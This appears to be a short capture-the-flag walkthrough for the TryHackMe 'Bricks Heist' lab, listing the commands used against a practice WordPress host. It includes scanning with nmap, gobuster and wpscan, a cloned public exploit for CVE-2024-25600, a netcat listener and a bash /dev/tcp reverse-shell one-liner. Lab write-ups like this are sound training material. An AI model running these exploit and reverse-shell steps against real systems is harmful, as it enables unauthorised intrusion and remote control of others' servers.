# TryHack3M: Bricks Heist
#### Add hostname to host file
```
echo $VICTIM bricks.thm >> /etc/hosts
cat /etc/hosts
```
##
## **Scans**
Initial scan
**Kali**
```
nmap -A $VICTIM
```
Longer scan
**Kali**
```
nmap -sV -sT -O -p 1-65535 $VICTIM
```
## **TCP/80 - HTTP**
**Kali**
```
gobuster dir -u http://bricks.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```
## **TCP/443 - HTTPS**
**Kali**
```
gobuster dir -k -u https://bricks.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```
**Kali**
```
wpscan --url https://bricks.thm/ --disable-tls-checks
```
**Kali**
```
git clone https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT.git
cd CVE-2024-25600-EXPLOIT/
python CVE-2024-25600.py -u https://bricks.thm/
```
### Initial Shell
**Kali**
```
nc -lvnp 1337
```
**Kali(Shell)**
```
bash -c 'exec bash -i >& /dev/tcp/10.10.181.161/1337 0>&1'
```
**Victim**
```
systemctl list-units --type=service --state=running
```
**Victim**
```
systemctl cat ubuntu.service
```
